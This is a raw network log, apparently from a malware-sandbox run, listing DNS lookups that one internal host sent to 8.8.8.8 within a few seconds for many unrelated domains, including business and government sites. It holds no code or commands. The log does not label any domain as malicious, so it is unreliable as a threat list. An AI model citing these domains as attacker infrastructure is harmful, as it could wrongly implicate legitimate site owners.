                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.722037077 CET192.168.2.58.8.8.80x8a43Standard query (0)sigtoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.722107887 CET192.168.2.58.8.8.80x6a70Standard query (0)metaforacom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.751759052 CET192.168.2.58.8.8.80xe9feStandard query (0)www.muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.764929056 CET192.168.2.58.8.8.80xfb42Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.822477102 CET192.168.2.58.8.8.80x1fccStandard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.862396955 CET192.168.2.58.8.8.80x146aStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.871112108 CET192.168.2.58.8.8.80xcebStandard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.907613993 CET192.168.2.58.8.8.80x214dStandard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.945785046 CET192.168.2.58.8.8.80x920bStandard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.987946033 CET192.168.2.58.8.8.80x598dStandard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.989614964 CET192.168.2.58.8.8.80x9ecaStandard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.067935944 CET192.168.2.58.8.8.80xc3aeStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.074434042 CET192.168.2.58.8.8.80xeb4dStandard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.109952927 CET192.168.2.58.8.8.80x6b55Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.118041039 CET192.168.2.58.8.8.80xc0aStandard query (0)mail.airmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.138097048 CET192.168.2.58.8.8.80xa2bdStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.148278952 CET192.168.2.58.8.8.80xc32Standard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.167346001 CET192.168.2.58.8.8.80x6ce6Standard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.190045118 CET192.168.2.58.8.8.80x89d0Standard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.191762924 CET192.168.2.58.8.8.80x8cfaStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.200005054 CET192.168.2.58.8.8.80x24e7Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.219332933 CET192.168.2.58.8.8.80xf474Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.234261990 CET192.168.2.58.8.8.80xffe1Standard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.249718904 CET192.168.2.58.8.8.80xfef0Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.258883953 CET192.168.2.58.8.8.80xdd7aStandard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.321352005 CET192.168.2.58.8.8.80x7c8Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.366981030 CET192.168.2.58.8.8.80x53a5Standard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.373655081 CET192.168.2.58.8.8.80xe2d3Standard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.373874903 CET192.168.2.58.8.8.80x9a07Standard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.482470036 CET192.168.2.58.8.8.80x63c3Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.514065981 CET192.168.2.58.8.8.80xb927Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.534204960 CET192.168.2.58.8.8.80xf527Standard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.535926104 CET192.168.2.58.8.8.80x3002Standard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.544783115 CET192.168.2.58.8.8.80x7442Standard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.547784090 CET192.168.2.58.8.8.80x8e2cStandard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.614327908 CET192.168.2.58.8.8.80x3aedStandard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.615048885 CET192.168.2.58.8.8.80x983aStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.615048885 CET192.168.2.58.8.8.80x856fStandard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.615286112 CET192.168.2.58.8.8.80xac59Standard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.615286112 CET192.168.2.58.8.8.80x2927Standard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.626425982 CET192.168.2.58.8.8.80x6cf4Standard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.662473917 CET192.168.2.58.8.8.80xa7eeStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.716492891 CET192.168.2.58.8.8.80xc524Standard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.719897985 CET192.168.2.58.8.8.80x8a13Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.776232004 CET192.168.2.58.8.8.80x3b8bStandard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.786376953 CET192.168.2.58.8.8.80x74d1Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.800900936 CET192.168.2.58.8.8.80x16abStandard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.908047915 CET192.168.2.58.8.8.80x2171Standard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.910552979 CET192.168.2.58.8.8.80xffb5Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.918348074 CET192.168.2.58.8.8.80x2dd4Standard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.922883034 CET192.168.2.58.8.8.80xb2c0Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.923429966 CET192.168.2.58.8.8.80xf60bStandard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.927824974 CET192.168.2.58.8.8.80x1c29Standard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.933173895 CET192.168.2.58.8.8.80xa400Standard query (0)hyab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.934324980 CET192.168.2.58.8.8.80x6ff2Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.935794115 CET192.168.2.58.8.8.80x5bcaStandard query (0)hyab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.942118883 CET192.168.2.58.8.8.80xcce1Standard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.038450003 CET192.168.2.58.8.8.80x9850Standard query (0)dataform.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.058737040 CET192.168.2.58.8.8.80x1cfcStandard query (0)www.hyabmagneter.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.059298038 CET192.168.2.58.8.8.80xa3d0Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.060041904 CET192.168.2.58.8.8.80x6732Standard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.060642958 CET192.168.2.58.8.8.80xa538Standard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.125144005 CET192.168.2.58.8.8.80x6393Standard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.148793936 CET192.168.2.58.8.8.80xc278Standard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.197375059 CET192.168.2.58.8.8.80xcd44Standard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.206351995 CET192.168.2.58.8.8.80xa6c4Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.222798109 CET192.168.2.58.8.8.80xcc83Standard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.240183115 CET192.168.2.58.8.8.80x2b10Standard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.314857960 CET192.168.2.58.8.8.80x3945Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.352904081 CET192.168.2.58.8.8.80x3072Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.391314030 CET192.168.2.58.8.8.80xe71Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.393251896 CET192.168.2.58.8.8.80xecedStandard query (0)kevyt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.406604052 CET192.168.2.58.8.8.80x9a07Standard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.410073996 CET192.168.2.58.8.8.80x70eeStandard query (0)hyabmagneter.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.418906927 CET192.168.2.58.8.8.80x2f5cStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.497565031 CET192.168.2.58.8.8.80xf511Standard query (0)hyabmagneter.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.534579992 CET192.168.2.58.8.8.80xc69dStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.561060905 CET192.168.2.58.8.8.80x35a0Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.587143898 CET192.168.2.58.8.8.80x5a5dStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.588346004 CET192.168.2.58.8.8.80xf569Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.589773893 CET192.168.2.58.8.8.80x8029Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.593986988 CET192.168.2.58.8.8.80x8fd5Standard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.612144947 CET192.168.2.58.8.8.80x1debStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.614118099 CET192.168.2.58.8.8.80x5564Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.633928061 CET192.168.2.58.8.8.80x4da0Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.645076036 CET192.168.2.58.8.8.80xa75aStandard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.678980112 CET192.168.2.58.8.8.80x434bStandard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.680803061 CET192.168.2.58.8.8.80xc837Standard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.689290047 CET192.168.2.58.8.8.80x3bdbStandard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.705765009 CET192.168.2.58.8.8.80xe489Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.708767891 CET192.168.2.58.8.8.80xcddStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.714055061 CET192.168.2.58.8.8.80x2f6dStandard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.714612961 CET192.168.2.58.8.8.80xc561Standard query (0)hubbikes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.761751890 CET192.168.2.58.8.8.80xd625Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.761751890 CET192.168.2.58.8.8.80x1d88Standard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.777929068 CET192.168.2.58.8.8.80xab3Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.824671984 CET192.168.2.58.8.8.80xb9faStandard query (0)www.hyabmagneter.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.907393932 CET192.168.2.58.8.8.80x6ff2Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.913604021 CET192.168.2.58.8.8.80x7edaStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.926261902 CET192.168.2.58.8.8.80xbc65Standard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.957593918 CET192.168.2.58.8.8.80x1063Standard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.957719088 CET192.168.2.58.8.8.80xe0aStandard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.990483999 CET192.168.2.58.8.8.80x6efdStandard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.005542040 CET192.168.2.58.8.8.80xe4f3Standard query (0)www.hyabmagneter.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.010488987 CET192.168.2.58.8.8.80x7aefStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.011038065 CET192.168.2.58.8.8.80x4440Standard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.036367893 CET192.168.2.58.8.8.80xf169Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.036742926 CET192.168.2.58.8.8.80x9cc3Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.059046984 CET192.168.2.58.8.8.80x1d26Standard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.059325933 CET192.168.2.58.8.8.80x88c2Standard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.062381983 CET192.168.2.58.8.8.80xecd1Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.079566002 CET192.168.2.58.8.8.80x61d7Standard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.156533003 CET192.168.2.58.8.8.80xd101Standard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.197987080 CET192.168.2.58.8.8.80x7284Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.326499939 CET192.168.2.58.8.8.80xc10aStandard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.391144037 CET192.168.2.58.8.8.80xd733Standard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.423774958 CET192.168.2.58.8.8.80xa013Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.448796034 CET192.168.2.58.8.8.80xbd20Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.453612089 CET192.168.2.58.8.8.80xe84dStandard query (0)xsui.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.453783035 CET192.168.2.58.8.8.80xe6bStandard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.482893944 CET192.168.2.58.8.8.80xe362Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.565830946 CET192.168.2.58.8.8.80xe5feStandard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.600176096 CET192.168.2.58.8.8.80x3a56Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.671833992 CET192.168.2.58.8.8.80x8853Standard query (0)sokuwan.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.672316074 CET192.168.2.58.8.8.80xd4dStandard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.690546989 CET192.168.2.58.8.8.80x5709Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.772927999 CET192.168.2.58.8.8.80x2f50Standard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.922785997 CET192.168.2.58.8.8.80xc99bStandard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.924097061 CET192.168.2.58.8.8.80xf0d5Standard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.950527906 CET192.168.2.58.8.8.80x6ff2Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.053587914 CET192.168.2.58.8.8.80x481cStandard query (0)cnti.krsn.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.123155117 CET192.168.2.58.8.8.80x6a5fStandard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.180943966 CET192.168.2.58.8.8.80x2529Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.189640045 CET192.168.2.58.8.8.80xa0a0Standard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.217191935 CET192.168.2.58.8.8.80x8413Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.222935915 CET192.168.2.58.8.8.80x84aStandard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.237299919 CET192.168.2.58.8.8.80x7a62Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.242100000 CET192.168.2.58.8.8.80xe5cStandard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.252707005 CET192.168.2.58.8.8.80x2a79Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.317755938 CET192.168.2.58.8.8.80x9dabStandard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.357424974 CET192.168.2.58.8.8.80x2528Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.357875109 CET192.168.2.58.8.8.80x161bStandard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.373008966 CET192.168.2.58.8.8.80x1660Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.378346920 CET192.168.2.58.8.8.80x257bStandard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.380635023 CET192.168.2.58.8.8.80x4464Standard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.396924973 CET192.168.2.58.8.8.80xa330Standard query (0)hubbikes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.459076881 CET192.168.2.58.8.8.80x9897Standard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.521851063 CET192.168.2.58.8.8.80x90e7Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.683721066 CET192.168.2.58.8.8.80x4669Standard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.695750952 CET192.168.2.58.8.8.80x31f1Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.761790037 CET192.168.2.58.8.8.80x2febStandard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.763223886 CET192.168.2.58.8.8.80xab23Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.836039066 CET192.168.2.58.8.8.80xf239Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.870784044 CET192.168.2.58.8.8.80x8168Standard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.878637075 CET192.168.2.58.8.8.80xaef3Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.905611038 CET192.168.2.58.8.8.80x8366Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.961625099 CET192.168.2.58.8.8.80x45faStandard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.974176884 CET192.168.2.58.8.8.80x38f9Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.030231953 CET192.168.2.58.8.8.80x2a75Standard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.038053036 CET192.168.2.58.8.8.80xc1d1Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.048943043 CET192.168.2.58.8.8.80xe6b5Standard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.159347057 CET192.168.2.58.8.8.80x4706Standard query (0)webways.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.173607111 CET192.168.2.58.8.8.80xe67fStandard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.263886929 CET192.168.2.58.8.8.80xc629Standard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.270824909 CET192.168.2.58.8.8.80xdaa4Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.275188923 CET192.168.2.58.8.8.80xe5cStandard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.287925959 CET192.168.2.58.8.8.80x244bStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.297656059 CET192.168.2.58.8.8.80xf2a1Standard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.306313992 CET192.168.2.58.8.8.80x1b6aStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.329356909 CET192.168.2.58.8.8.80xceadStandard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.335464954 CET192.168.2.58.8.8.80x2978Standard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.341332912 CET192.168.2.58.8.8.80x774aStandard query (0)cvswl.orgA (IP address)IN (0x0001)false
